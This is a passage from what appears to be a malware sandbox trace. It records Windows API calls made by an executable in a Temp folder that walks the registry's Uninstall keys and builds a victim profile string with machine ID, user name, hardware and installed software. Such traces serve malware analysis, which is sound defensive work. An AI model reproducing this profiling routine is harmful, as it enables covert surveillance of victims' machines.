(United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 " [0175.933] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001" [0175.933] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\n" [0175.934] RegCloseKey (hKey=0x354) returned 0x0 [0175.934] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x28, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0044-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.934] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0044-0409-0000-0000000FF1CE}") returned 90 [0175.934] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0044-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.934] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft InfoPath MUI (English) 2016", lpcbData=0x197fd4*=0x26) returned 0x0 [0175.934] lstrlenA (lpString="Microsoft InfoPath MUI (English) 2016") returned 37 [0175.934] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\n", lpString2="Microsoft InfoPath MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016" [0175.934] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.934] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 